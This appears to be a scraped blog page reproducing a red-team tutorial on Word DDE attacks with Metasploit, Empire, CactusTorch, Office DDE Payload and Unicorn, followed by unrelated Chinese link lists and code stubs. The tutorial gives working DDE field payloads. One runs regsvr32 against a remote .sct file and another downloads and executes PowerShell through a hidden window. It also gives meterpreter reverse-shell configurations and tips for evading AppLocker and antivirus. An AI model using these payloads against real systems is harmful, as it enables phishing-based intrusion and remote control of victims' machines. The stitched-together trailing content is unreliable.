payload:

ctrl+F9

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

  

Since this technique doesn’t infect the Word document with malicious macros that can be detected by email gateways it has the same result as remote code execution can be achieved. This attack is very effective and therefore it is used widely in malware campaigns and red team assessments. The following tools can generate various DDE payloads that could be used during a red team assessment.

  1. Metasploit
  2. Empire
  3. CactusTorch DDE Auto
  4. Office DDE Payload
  5. Unicorn

Metasploit

Metasploit Framework has a module which can be used to deliver attacks via DDE.

exploit/windows/fileformat/office_dde_delivery

This module can generate a Word documents in .doc and .rtf format which will contain a DDE payload. This module can be configured easily with the following parameters.

set SRVHOST IP
set payload windows/meterpreter/reverse_tcp
set LHOST IP
set LPORT 4444
exploit

Metasploit DDE Module — Configuration

The benefit of this module is that the DDE payload will be executed by utilising the regsvr32 method to evade AppLocker restrictions and that the dialog box that will appear to the target user will not contain any alarming messages.

DDE payloads will be generated in that form:

DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c regsvr32 /s /n /u /i:http://192.168.1.203:8080/UEdLz2E3W.sct scrobj.dll"

The dialog box that will appear to the user when the malicious word document will open will look legitimate as it will ask the user to start MSword.exe. However this is not a valid path.

Metasploit DDE Module — Word Dialog Box

If the user choose to start the fake MSword.exe the payload will executed and a Meterpreter session will open.

Metasploit DDE Module — Meterpreter

Interaction with the Meterpeter session can start and commands can be executed on the target host.

sessions -i 1
getuid
sysinfo

Metasploit DDE Module — Interaction with the Session

Another similar Metasploit module has been developed (even though it is not part of the Metasploit) which can generate DDE payloads in HTA format. However it cannot generate the Word document. This module can be downloaded from the following location.

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Download DDE Delivery Module

In order to load the module with the Metasploit Framework it needs to be moved to a suitable Metasploit directory.

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Move DDE Delivery Module to Metasploit

The Metasploit needs to start and from the console the reload command will load all the modules that exists in the Metasploit directories.

msfconsole
reload_all

Metasploit Reload Command

This module can be configured like the previous:

use exploit/windows/dde_delivery
set SRVHOST IP
set payload windows/meterpreter/reverse_tcp
set LHOST IP
set LPORT 4444
exploit

DDE Delivery Module Configuration

The module will start a server on port 8080 which will contain the arbitrary code and it will generate the DDE payload which needs to be used inside a field of a Word document.

DDE Delivery Module Generation of HTA Payload

The dialog box that will appear to the user upon opening the Word document will be the following:

DDE Delivery Module — Dialog Box

The payload will executed if the user choose the option Yes.

DDE Delivery Module — Payload Delivery

Empire

Empire is one of the most popular command and control tools. It provides a stager which can generate Word documents with embedded DDE payloads. A listener needs to be configured first that will accept the connection.

(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
(Empire: listeners/http) > execute
[*] Starting listener 'http'
[+] Listener successfully started!

Empire — Listener Configuration

The command execute will start the listener.

Empire — Listener Started

The list of active listeners can be obtained with the listeners command.

Empire — List of Active Listeners

The stager that can replicate the DDE attack is the following:

usestager windows/macroless_msword http

Empire — Macroless Stager

Upon execution the stager will use the active listener and it will create a PowerShell script that will contain the arbitrary code and finally it will generate the Word document in .docx format that will have embedded the DDE payload.

Empire — Macroless Stager Word Generation

The DDE payload that the Empire stager generates would be the following.

DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://192.168.1.204:8000/default.ps1');powershell -e $e "

The default.ps1 PowerShell script needs to be hosted on a web server. Since port 80 is already occupied by the listener another port needs to be used. In python the following command will start a web server on port 8000.

python -m SimpleHTTPServer

Python — HTTP Server

The DDE payload that Empire is using will produce the following dialog box in Microsoft Word.

Empire — Dialog Box

The Yes option will trigger the payload and the Empire listener will receive the connection.

Empire — Agents via Macroless Stager

CactusTorch DDE Auto

William Genovese developed a bash script called CactusTorch DDE Auto which utilises CactusTorch tool for generation of payloads and Metasploit Framework for configuration of the listener that will receive the connection.

chmod +x cactus.sh
./cactus.sh

CactusTorch DDE Auto — IP Usage

CactusTorch DDE Auto will retrieve automatically the internal and the external IP address of the host. The script only needs three parameters to automate the attack:

  1. IP
  2. Port
  3. Payload

CactusTorch DDE Auto — Configuration

Once the configuration is finished the script will generate a base64 payload in various formats, move the payload files into an Apache directory and start the service.

CactusTorch DDE Auto — Generation of Shellcode

CactusTorch DDE Auto can generate payloads in JS, VBS and HTA format.

CactusTorch DDE Auto — DDE Payloads

The dialog box that will appear upon opening the Word document with the DDE payload will be the following:

CactusTorch DDE Auto — Word Dialog Box

The payloads will be executed through the command prompt if the user choice is Yes. Unfortunately the script doesn’t perform any obfuscation on the payload or in the dialog box, making it easier for the target user and blue team to detect the suspicious activity.

CactusTorch DDE Auto — Meterpreter

Office DDE Payload

Dominic Spinosa developed a python script which can generate office Word documents that can utilize various methods such as:

  1. Word with DDE payload
  2. Word with DDE frameset
  3. Word with obfuscated DDE

These methods have been described in detail here. Prior to any execution of the script dependencies must be installed:

pip install -r requirements.txt

Office DDE Payloads — Install Dependencies

It is up to the red teamer to decide which payload to use and which method in order to assist in evasion. This script can be combined with the following Metasploit module:

exploit/windows/dde_delivery

Office DDE Payload s— Generate Command

The script upon execution it will require from the user to insert the DDE payload of his choice in three parts. Furthermore it will ask the user to enter the URL of the server that the payload word document will be hosted in order to construct the DDE attack via frameset on the template document.

Office DDE Payloads — Generate Payload and Template

There are two delivery methods of this attack. One is to send the payload-final.docx directly to the target user and by setting a listener to obtain a meterpeter session and the other to host the payload-final.docx on a web server and use frameset to create a reference on another Word document that contains the DDE. The frameset would be injected inside of the webSettings.xml file.

Office DDE Payloads — Frameset

The office dde payloads will create and the webSettings.xml.rels file that will contain the link of where the Word document that contains the DDE is hosted.

Office DDE Payloads — Target relationship

When the target opens the template document that contains the frameset the following dialog box will appear:

Office DDE Payloads — 1st Dialog Box

The second dialog box will execute the arbitrary payload if the option Yes is chosen by the user:

Office DDE Payloads — 2nd Dialog Box

The listener that was set by the module will receive the connection and a Meterpreter session will open.

Office DDE Payloads — Meterpreter

Unicorn

Dave Kennedy has imported the DDE attack into unicorn which is a tool that can inject shellcode into memory by using the PowerShell downgrade attack. Executing unicorn with the following parameters will generate the shellcode payload:

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.204 4444 dde

Unicorn — Shellcode Generation

Unicorn will automatically generate various files:

  1. powershell_attack.txt // DDE Payload
  2. unicorn.rc // Metasploit listener configuration
  3. download.ps1 // Shellcode

Running the unicorn.rc will initiate the Metasploit handler with the appropriate configuration.

msfconsole -r unicorn.rc

Unicorn — Metasploit Listener Configuration

Unicorn uses the field code obfuscation similar to Office DDE Payloads tool in order to avoid detection. The DDE payload generated by unicorn will look similar to the below:

Unicorn — DDE Payload Obfuscation

The download.ps1 PowerShell script needs to be hosted on a server so when the document is opened it will try to execute the payload. The Word dialog box that will appear to the user will inform him that an Add-On is not accessible and to start Word instead making the dialog box more sophisticated.

Unicorn — Word Dialog Box

Conclusion

Antivirus companies have made progress and they are trying to detect DDE attacks. Therefore obfuscation is necessary for the construction of a payload that has higher possibility to evade detection and establish an initial footprint in the network.

The following table summarises the list of DDE tools and their features.

DDE Payloads — Table

word dde payload的更多相关文章

  1. cve-2017-0199&metasploit复现过程

    CVE-2017-0199 WORD/RTF嵌入OLE调用远程文件执行的一个漏洞.不需要用户交互.打开文档即中招 首先更新msf到最新,据说最新版简化了利用过程,不需要开启hta这一步.但没测成功 还 ...

  2. {黑掉这个盒子} \\ FluxCapacitor Write-Up

    源标题:{Hack the Box} \ FluxCapacitor Write-Up 标签(空格分隔): CTF   好孩子们.今天我们将学习耐心和情绪管理的优点.并且也许有一些关于绕过WEB应用防 ...

  3. HA: Armour-Write-up

    下载地址:点我 bilibili:点我 信息收集 nmap扫存活找到IP为:192.168.116.140 ➜ ~ nmap -sn 192.168.116.1/24 Starting Nmap 7. ...

  4. Write-up-CH4INRULZ_v1.0.1

    关于 下载地址:点我 哔哩哔哩:哔哩哔哩 信息收集 网卡:vboxnet0,192.168.56.1/24,Nmap扫存活主机发现IP为192.168.56.101 ➜ ~ nmap -sn 192. ...

  5. 用DDE控制Word

    DDE(Dynamic Data Exchange),称为动态数据交换.用于进程间的通讯,看看他如何来和Word交互. 在System页签下有TDdeClientConv组件,拖一个放到界面上,然后我 ...

  6. Office DDE漏洞学习笔记

    1.前言 2017年下半年爆发出来的Office漏洞,一直没有空做笔记记录.在病毒分析中也看到有利用这个漏洞的样本,针对Office系列软件发起的钓鱼攻击和APT攻击一直是安全攻防的热点. 2.off ...

  7. word域3

    WORD是文字处理软件,我们在日常处理一些文字时经常遇到一些问题,如:各种公式的录入,尽管Word都提供了"公式编辑器",但其插入的却是"对象",有时排版会感觉 ...

  8. OpenXml操作Word的一些操作总结.无word组件生成word.

    OpenXml相对于用MS提供的COM组件来生成WORD,有如下优势: 1.相对于MS 的COM组件,因为版本带来的不兼容问题,及各种会生成WORD半途会崩溃的问题. 2.对比填满一张30多页的WOR ...

  9. OpenXml操作Word的一些操作总结. - 天天不在

    OpenXml相对于用MS提供的COM组件来生成WORD,有如下优势: 1.相对于MS 的COM组件,因为版本带来的不兼容问题,及各种会生成WORD半途会崩溃的问题. 2.对比填满一张30多页的WOR ...

随机推荐

  1. weak_ptr

    #include <iostream> #include <memory> using namespace std; int main(int argc, char **arg ...

  2. CentOS安装jsoncpp

    两种安装方式: 通过cmake安装 通过scons安装 cmake安装见cmake安装jsoncpp,scons安装见下文. 1. 安装scons .tar.gz export MYSCONS=/ro ...

  3. K - Painful Bases 状压dp

    Painful Bases LightOJ - 1021 这个题目一开始看,感觉有点像数位dp,但是因为是最多有16进制,因为限制了每一个数字都不同最多就有16个数. 所以可以用状压dp,看网上题解是 ...

  4. F - Watching Fireworks is Fun

    C. Watching Fireworks is Fun 题目大意: 一个城镇有n个区域,从左到右1-n,每个区域之间距离1个单位距离.节日中有m个烟火要放,给定放的地点a[ i ].时间t[ i ] ...

  5. 常见的GAN网络的相关原理及推导

    常见的GAN网络的相关原理及推导 在上一篇中我们给大家介绍了GAN的相关原理和推导,GAN是VAE的后一半,再加上一个鉴别网络.这样而导致了完全不同的训练方式. GAN,生成对抗网络,主要有两部分构成 ...

  6. 安装Kibana出现的问题

    安装Kibana出现的问题 前言 该问题的出现是在安装配置完成之后,也就是说下载好了kibana的相关包,在启动过程中出现的错误,该错误是在centos6的机器上引发的,是因为系统中的GLIBC_2. ...

  7. 罗马数字转int

    // I(1).V(5).X(10).L(50).C(100).D(500)和M(1000) 1.重复数次:一个罗马数字重复几次,就表示这个数的几倍.2.右加左减:2.1 在较大的罗马数字的右边记上较 ...

  8. 设计模式系列之适配器模式(Adapter Pattern)——不兼容结构的协调

    模式概述 模式定义 模式结构图 模式伪代码 类适配器,双向适配器,缺省适配器 类适配器 双向适配器 缺省适配器 模式应用 模式在JDK中的应用 模式在开源项目中的应用 模式总结 主要优点 主要缺点 适 ...

  9. X-CTF(REVERSE高级) 666

    主函数输入的字符会和key比较长度和enflag比较内容,所以这道题的flag和输入有关 key长度为0x12,enflag的值为:izwhroz""w"v.K" ...

  10. LinkedList源码(add方法)

    对于要有扎实的java基础,集合是必须掌握的,而且精读这部分的源码很有用,也很有必要.而LinkedList是在java.util包下,和java.io,java.lang都是比较常用,而且比较简单. ...